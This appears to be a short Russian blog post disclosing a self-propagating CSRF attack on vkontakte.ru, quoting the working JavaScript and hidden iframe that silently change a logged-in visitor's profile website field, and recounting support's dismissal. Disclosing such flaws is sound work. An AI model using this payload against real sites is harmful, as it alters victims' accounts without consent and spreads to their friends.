Обнаружил забавную атаку на сайт vkontakte.ru. При переходе на сайт
tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает
следующий джаваскрипт:
<script>
function doit() {
var html;
html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>
Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com,
броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле "Веб-сайт"
станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет, кликнет на этот линк
и изменит профайл себе... И так далее. Этот вид атак называется Cross Site
Request Forgery. Сам по себе CSRF довольно скучен. Но в данном случае забавно
то, что каждый заразившийся становится разносчиком CSRF-линка. Отписал в
тех-поддержку, где столкнулся с "Это не баг!", "Не кликайте по подозрительным
ссылкам!" и прочим. Надеюсь пользователей они ценят и поправят.
